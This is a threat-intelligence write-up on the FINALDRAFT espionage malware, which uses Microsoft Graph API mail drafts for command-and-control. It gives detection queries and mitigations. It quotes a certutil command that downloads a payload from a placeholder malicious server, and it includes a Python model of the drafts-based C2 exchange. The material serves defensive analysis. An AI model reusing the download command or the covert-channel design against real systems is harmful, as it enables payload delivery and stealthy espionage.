FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux


2025-02-14

Threat hunters have uncovered a sophisticated malware campaign targeting a South American nation’s foreign ministry that leverages the Microsoft Graph API for espionage. The malware, named FINALDRAFT, is a remote administration tool written in C++. It can execute encrypted shellcode, inject it into low-value Windows processes such as “mspaint.exe,” and abuse an Outlook mailbox, reached through the Graph API, as its command-and-control (C2) channel.

The attackers used Microsoft’s built-in `certutil` utility to download additional payloads from a web server associated with the Foreign Ministry. The commands were executed through the Windows Remote Management Remote Shell plugin (WinrsHost.exe), which indicates lateral movement from a host that had already been compromised.

Key Commands and Techniques:

1. Certutil for Payload Download:

certutil -urlcache -split -f http://malicious-server/payload.exe C:\path\to\payload.exe

This command fetches the payload over HTTP from the attacker’s staging web server and writes it to the given path. Because `certutil` is a signed Microsoft binary, the download looks like ordinary administrative activity unless the command line itself is inspected.

2. Process Injection with FINALDRAFT:

The malware spawns a new `mspaint.exe` process and injects its shellcode into it, so the malicious code runs under the name of a legitimate, signed Windows binary rather than as a process of its own.

3. Microsoft Graph API Abuse:

FINALDRAFT uses the Microsoft Graph API to read commands stored as messages in the mailbox’s Drafts folder and writes execution results back as new draft emails. The mailbox itself is the C2 channel: no mail is ever sent, and every request goes to legitimate Microsoft endpoints over HTTPS, so the traffic blends in with normal Office 365 activity.

4. PowerPick for Evasion:

Instead of invoking powershell.exe, FINALDRAFT patches Event Tracing for Windows (ETW) related APIs in its own process to suppress telemetry and uses the PowerPick approach from the Empire post-exploitation toolkit, hosting the PowerShell runtime (System.Management.Automation) directly inside the malware’s process. Operator-supplied PowerShell commands therefore run without a powershell.exe child process ever appearing, which defeats detections that key on that process name.

5. NTLM Hash Theft:

The malware can start new processes under the identity of stolen NTLM hashes (pass-the-hash), which lets the operators move laterally to other hosts without knowing the plaintext passwords.
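The drafts-based C2 exchange described under “Microsoft Graph API Abuse” is easiest to understand as a two-party protocol. The following Python model is an added example written for this article, not FINALDRAFT’s code or Elastic’s: it replaces the real Graph endpoints (`/me/mailFolders/drafts/messages`) with an in-memory stand-in, the `p_`/`r_` subject prefixes and the JSON body format are assumptions, and the “commands” are canned lookups rather than real execution.

```python
"""Model of a drafts-folder C2 channel over an in-memory stand-in for Graph mailbox calls.

Added example for this article (not the malware's own code). The subject prefixes,
body format and simulated commands are assumptions chosen for illustration.
"""
import itertools
import json


class FakeGraphDrafts:
    """Stand-in for the Graph drafts endpoints: list, create and delete messages.

    A real implant would issue HTTPS requests to graph.microsoft.com with a bearer
    token; here the calls operate on a dict so the example runs offline.
    """

    def __init__(self):
        self._ids = itertools.count(1)
        self.messages = {}
        self.sent = []  # stays empty: drafts are never sent, so mail flow sees nothing

    def list_messages(self, subject_prefix=""):
        return [m for m in self.messages.values() if m["subject"].startswith(subject_prefix)]

    def create_message(self, subject, body):
        mid = f"AAMk{next(self._ids):06d}"  # constructed id, shaped like a Graph message id
        self.messages[mid] = {"id": mid, "subject": subject, "body": body, "isDraft": True}
        return mid

    def delete_message(self, mid):
        del self.messages[mid]


TASK_PREFIX = "p_"    # assumed convention: operator -> implant
RESULT_PREFIX = "r_"  # assumed convention: implant -> operator

# Canned outputs standing in for real command execution (constructed values).
SIMULATED_HANDLERS = {
    "whoami": lambda: "corp\\victim",
    "hostname": lambda: "WS-0001",
}


def operator_task(mailbox, session_id, command):
    """Operator side: queue a command by saving a draft addressed to nobody."""
    return mailbox.create_message(f"{TASK_PREFIX}{session_id}", json.dumps({"cmd": command}))


def implant_poll(mailbox, session_id):
    """Implant side: read tasks from Drafts, delete them, write results back as new drafts."""
    result_ids = []
    for task in mailbox.list_messages(f"{TASK_PREFIX}{session_id}"):
        cmd = json.loads(task["body"])["cmd"]
        handler = SIMULATED_HANDLERS.get(cmd)
        output = handler() if handler else f"unknown command: {cmd}"
        mailbox.delete_message(task["id"])  # consume the task so it is not run twice
        rid = mailbox.create_message(
            f"{RESULT_PREFIX}{session_id}", json.dumps({"cmd": cmd, "output": output})
        )
        result_ids.append(rid)
    return result_ids


def operator_collect(mailbox, session_id):
    """Operator side: pull result drafts for the session and remove them."""
    results = []
    for msg in mailbox.list_messages(f"{RESULT_PREFIX}{session_id}"):
        results.append(json.loads(msg["body"]))
        mailbox.delete_message(msg["id"])
    return results


if __name__ == "__main__":
    mb = FakeGraphDrafts()
    operator_task(mb, "s1", "whoami")
    implant_poll(mb, "s1")
    print(operator_collect(mb, "s1"))
    print("messages sent:", len(mb.sent))  # 0: the channel never touches the outbox
```

The point for defenders is the last line: because tasks and results only ever exist as drafts, mail-flow rules, DLP and transport logs never see the channel. What remains observable is the Graph API activity itself (mailbox audit records for draft creation and deletion, and the OAuth token use behind it), and the fact that a process other than Outlook or a browser is talking to graph.microsoft.com.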

Practice-Verified Commands:

  • Detecting Certutil Abuse:
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
        Where-Object { $_.Message -match 'certutil\.exe' -and $_.Message -match 'urlcache|http' } |
        Select-Object TimeCreated, Message

    This query pulls Sysmon process-creation events (Event ID 1) and keeps only those where `certutil` was run with a download-style command line. Filtering on the event ID in the hashtable is far cheaper than matching `*certutil*` across the whole log, and checking for `urlcache` or a URL avoids flagging legitimate certificate work such as `certutil -hashfile`. A parent image of `winrshost.exe` in a matching event is the lateral-movement signature described above.

  • Monitoring Process Injection:

    Get-Process -Name mspaint -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Modules } |
        Where-Object { $_.FileName -notlike "$env:SystemRoot\*" } |
        Select-Object ModuleName, FileName

    This lists any module loaded into a running `mspaint.exe` from outside the Windows directory, which a stock Paint process should never have. Note the limitation: shellcode injection maps no DLL at all, so a module listing can come back clean on an injected process. The more reliable signal is Sysmon Event ID 8 (CreateRemoteThread) or Event ID 10 (ProcessAccess) with `TargetImage` ending in `mspaint.exe` and a `SourceImage` that is not a Windows system binary.

  • Blocking Microsoft Graph API Abuse:
    Configure Conditional Access policies in Microsoft Entra ID (formerly Azure AD) to restrict Graph API and Exchange Online access to compliant devices and trusted locations. This only helps when the mailbox being abused belongs to your tenant; if the implant signs in to an attacker-controlled mailbox, your policies do not apply, and the detection opportunity shifts to the endpoint and the network: unexpected processes connecting to graph.microsoft.com and login.microsoftonline.com.

What Undercode Say:

The FINALDRAFT campaign highlights the growing sophistication of cyber-espionage tooling, in particular its willingness to ride on legitimate cloud services such as the Microsoft Graph API for stealthy command-and-control. The use of `certutil` for payload delivery and an in-process PowerShell host for evasion underscores the importance of monitoring administrative tools and PowerShell activity in enterprise environments, rather than trusting a binary because Microsoft signed it.

To mitigate such threats, organizations should:

  1. Regularly audit and restrict the use of tools like `certutil` and WinrsHost.exe.
  2. Implement robust endpoint detection and response (EDR) solutions to monitor process injection and lateral movement.
  3. Use Azure AD Conditional Access to limit Graph API access to trusted devices and locations.
  4. Enable Sysmon logging and keep EDR sensors outside the monitored process (kernel callbacks and ETW consumers run by the agent), since a process that patches ETW in its own address space can silence only its own telemetry.
  5. Educate employees on phishing and social engineering tactics to reduce the risk of initial compromise.

For further reading on securing Microsoft Graph API and detecting FINALDRAFT-like threats, refer to:
Microsoft Graph API Security Best Practices
Elastic Security Labs Report on REF7707

By adopting a proactive approach to threat hunting and leveraging advanced detection mechanisms, organizations can significantly reduce their exposure to such advanced persistent threats (APTs).
